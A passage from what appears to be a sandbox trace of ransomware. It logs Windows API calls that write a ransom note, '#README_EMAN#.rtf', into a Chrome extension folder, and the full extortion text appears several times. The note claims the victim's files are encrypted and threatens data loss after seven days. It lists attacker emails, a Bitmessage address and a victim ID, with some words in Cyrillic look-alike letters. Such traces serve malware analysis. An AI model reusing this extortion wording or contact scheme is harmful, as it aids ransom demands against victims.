w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.379] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245c778, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nóÖÏÅÂÁÊz\x0b|\x14…§o\x15Ô\x09ØÕ0\"", lpUsedDefaultChar=0x0) returned 8717 [0286.380] WriteFile (in: hFile=0x2e8, lpBuffer=0x245c778*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245c778*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.380] CloseHandle (hObject=0x2e8) returned 1 [0286.380] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\#readme_eman#.rtf")) returned 0xffffffff [0286.383] GetLastError () returned 0x2 [0286.383] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0286.383] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 